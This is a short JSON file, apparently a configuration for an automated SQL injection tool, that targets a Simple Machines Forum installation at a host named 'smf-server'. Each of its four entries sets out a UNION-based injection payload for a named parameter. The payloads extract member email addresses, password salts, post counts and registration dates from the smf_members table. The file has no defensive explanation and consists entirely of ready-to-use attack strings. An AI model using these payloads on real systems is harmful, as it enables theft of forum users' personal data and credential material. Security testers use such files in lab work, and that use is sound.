[
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "unionstr",
        "statements": [
            "1' union select all email_address from smf_members;--"
            ]
    },
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "unionstr2",
        "statements": [
            "1' union select all email_address,password_salt from smf_members;--"
            ]
    },
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "unionint",
        "statements": [
            "1' union select all posts from smf_members;--"
            ]
    },
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "unionint2",
        "statements": [
            "1' union select all posts,date_registered from smf_members;--"
            ]
    }
]
